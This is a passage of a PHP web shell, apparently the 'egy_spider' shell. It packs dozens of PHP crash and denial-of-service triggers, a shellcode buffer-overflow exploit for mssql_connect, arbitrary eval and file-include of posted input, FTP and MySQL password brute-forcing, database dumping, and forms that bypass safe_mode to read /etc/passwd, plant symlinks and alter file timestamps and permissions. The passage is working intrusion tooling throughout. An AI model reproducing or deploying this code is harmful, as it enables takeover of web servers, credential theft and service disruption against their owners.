@str_repeat("a", 10000)); + break; + case 'dos7': + @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); + break; + case 'dos8': + @shell_exec("killall -11 httpd"); + break; + case 'dos9': + function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx(); + break; + case 'dos10': + $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0); + break; + case 'dos11': + 
@array_fill(1,123456789,"Infigo-IS"); + break; + case 'dos12': + @substr_compare("A","A",12345678); + break; + case 'dos13': + @unserialize("a:2147483649:{"); + break; + case 'dos14': + $Data = @str_ireplace("\n", "<br>", $Data); + break; + case 'dos15': + function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);} + $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);} + @htmlentities($str1, ENT_NOQUOTES, "UTF-8"); + break; + case 'dos16': + $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e); + for ($i=0; $i<1000; $i++) $arr[$i]=array(array("")); + unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]); + break; + case 'dos17': + $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; + $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; + $x = "AQ "; + unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x); + break; + case 'dos18': + $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); + if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) + echo "Msg not sent because $msg_err\n"; + if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { + echo "$msg\n"; + } else { echo "Received $msg_error fetching message\n"; break; } + @msg_remove_queue ($msg_id); + break; + case 'dos19': + $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r"); + break; + case 'dos20': + $hashtable = str_repeat("A", 39); + $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08); + $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99); + $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}'; + for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; } + $str .= 
's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;'; + @unserialize($str); + break; + case 'dos21': + imagecreatetruecolor(1234,1073741824); + break; + case 'dos22': + imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120); + break; + case 'dos23': + $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b); + break; + case 'dos24': + setlocale(LC_COLLATE, str_repeat("A", 34438013)); + break; + case 'dos25': + glob(str_repeat("A", 9638013)); + break; + case 'dos26': + glob("a",-1); + break; + case 'dos27': + fnmatch("*[1]e", str_repeat("A", 9638013)); + break; + case 'dos28': + if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";} + break; + case 'dos29': + if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');} + break; + case 'dos30': + $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c); + break; + case 'dos31': + if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );} + break; + case 'dos32': + if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . 
$eip_unicode );} + break; + case 'dos33': + $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP); + break; + case 'dos34': + if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);} + break; + case 'dos35': + $a = str_repeat("/", 4199000); iconv(1, $a, 1); + break; + case 'dos36': + $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a); + break; + case 'dos37': + $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a); + break; + case 'dos39': + sprintf("[%'A2147483646s]\n", "A"); + break; + break; + case 'dos40': +// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow +// poc exploit (and safe_mode bypass) +// windows 2000 sp3 en / seh overwrite +// by rgod +// site: http://egyspider.eu + + +// u can easily adjust for php5 +// this as my little contribute to MOPB + + +$____scode= +"\xeb\x1b". +"\x5b". +"\x31\xc0". +"\x50". +"\x31\xc0". +"\x88\x43\x59". +"\x53". +"\xbb\xca\x73\xe9\x77". //WinExec +"\xff\xd3". +"\x31\xc0". +"\x50". +"\xbb\x5c\xcf\xe9\x77". //ExitProcess +"\xff\xd3". +"\xe8\xe0\xff\xff\xff". +"\x63\x6d\x64". +"\x2e". +"\x65". +"\x78\x65". +"\x20\x2f". +"\x63\x20". 
+"start notepad & "; + + + $eip="\xdc\xf5\x12"; + $____suntzu=str_repeat("\x90",100); + $____suntzu.=$____scode; + $____suntzu.=str_repeat("a",2460 - strlen($____scode)); + $____suntzu.=$eip; + break; + case 'zend': + if(empty($_POST['zend'])){ +} else { + + +$dezend=$_POST['zend']; +include($_POST['zend']); +print_r($GLOBALS); +require_once("$dezend"); +echo "</textarea></p>"; +} +break; + case 'dos38': + $a = str_repeat("/", 9791999); iconv_strlen(1, $a); + break; +} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} + + +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } } + @ftp_close($connection); + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; } + @ftp_close($connection); + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + + +if ($_POST['cmd']=="db_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = $user; + if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; } + } + if(isset($_POST['reverse'])) + { + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = strrev($user); + if($sql->connect()) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } + } + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $user; + if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; } + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + + +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} } + else { echo "[-] ERROR! 
Can't write in dump file"; } + } + } + + +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; + + +function div_title($title, $id) +{ + return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>'; +} +function div($id) + { + if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">'; + $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39'); + if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } + +if(!$safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + + + + + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id20').$table_up2.div('id20').$ts; +echo "<table class=table1 width=100% align=center>"; +echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +if($unix && @function_exists('touch')){ +echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"]))) +.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>" +.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):("")))); +echo sr(15,"<b> or set Day".$arrow."</b>", +' +<select name="day" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option 
value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +</select>' +.ws(4)."<b>Month".$arrow."</b>" +.' +<select name="month" size="1"> +<option value="January">January</option> +<option value="February">February</option> +<option value="March">March</option> +<option value="April">April</option> +<option value="May">May</option> +<option value="June">June</option> +<option value="July">July</option> +<option value="August">August</option> +<option value="September">September</option> +<option value="October">October</option> +<option value="November">November</option> +<option value="December">December</option> +</select>' +.ws(4)."<b>Year".$arrow."</b>" +.' +<select name="year" size="1"> +<option value="1998">1998</option> +<option value="1999">1999</option> +<option value="2000">2000</option> +<option value="2001">2001</option> +<option value="2002">2002</option> +<option value="2003">2003</option> +<option value="2004">2004</option> +<option value="2005">2005</option> +<option value="2006">2006</option> +<option value="2006">2007</option> +<option value="2006">2008</option> +<option value="2006">2009</option> +<option value="2006">2010</option> +</select>' +.ws(4)."<b>Hour".$arrow."</b>" +.' 
+<select name="chasi" size="1"> +<option value="01">01</option> +<option value="02">02</option> +<option value="03">03</option> +<option value="04">04</option> +<option value="05">05</option> +<option value="06">06</option> +<option value="07">07</option> +<option value="08">08</option> +<option value="09">09</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +</select>' +.ws(4)."<b>Minute".$arrow."</b>" +.' +<select name="minutes" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +<option value="32">32</option> +<option value="33">33</option> +<option value="34">34</option> +<option value="35">35</option> 
+<option value="36">36</option> +<option value="37">37</option> +<option value="38">38</option> +<option value="39">39</option> +<option value="40">40</option> +<option value="41">41</option> +<option value="42">42</option> +<option value="43">43</option> +<option value="44">44</option> +<option value="45">45</option> +<option value="46">46</option> +<option value="47">47</option> +<option value="48">48</option> +<option value="49">49</option> +<option value="50">50</option> +<option value="51">51</option> +<option value="52">52</option> +<option value="53">53</option> +<option value="54">54</option> +<option value="55">55</option> +<option value="56">56</option> +<option value="57">57</option> +<option value="58">58</option> +<option value="59">59</option> +</select>' +.ws(4)."<b>Second".$arrow."</b>" +.' +<select name="second" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +<option value="32">32</option> +<option value="33">33</option> +<option value="34">34</option> +<option value="35">35</option> +<option value="36">36</option> 
+<option value="37">37</option> +<option value="38">38</option> +<option value="39">39</option> +<option value="40">40</option> +<option value="41">41</option> +<option value="42">42</option> +<option value="43">43</option> +<option value="44">44</option> +<option value="45">45</option> +<option value="46">46</option> +<option value="47">47</option> +<option value="48">48</option> +<option value="49">49</option> +<option value="50">50</option> +<option value="51">51</option> +<option value="52">52</option> +<option value="53">53</option> +<option value="54">54</option> +<option value="55">55</option> +<option value="56">56</option> +<option value="57">57</option> +<option value="58">58</option> +<option value="59">59</option> +</select>' +.in('hidden','cmd',0,'touch') +.in('hidden','dir',0,$dir) +.ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +$select=''; +if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";} +if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";} +if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";} +if($unix && $select){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts; +echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo 
$fs.$table_up1.div_title($lang[$language.'_text7'],'id5555').$table_up2.div('id5555').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id50').$table_up2.div('id50').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; + + +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." 
* ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} + + +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id800').$table_up2.$font; +echo "<div align=center>".div('id800')."<textarea name=php_eval cols=100 rows=10>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"egy_spider.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; + + +echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id520').$table_up2.div('id520').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id500').$table_up2.div('id500').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id510').$table_up2.div('id510').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id800').$table_up2.div('id800').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id900').$table_up2.div('id900').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id980').$table_up2.div('id980').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'Paralyzing been planted and you can usefilename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id801').$table_up2.div('id801').$ts; +echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id5505').$table_up2.div('id5505').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text151'],'id1221').$table_up2.div('id1221').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test_5_2_6',85,(!empty($_POST['test_5_2_6'])?($_POST['test_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +echo $fs.$table_up1.div_title($lang[$language.'_text161'],'id12211').$table_up2.div('id12211').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_5_2_6',85,(!empty($_POST['test2_5_2_6'])?($_POST['test2_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text162'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + +echo 
$fs.$table_up1.div_title($lang[$language.'_text163'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_perl').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
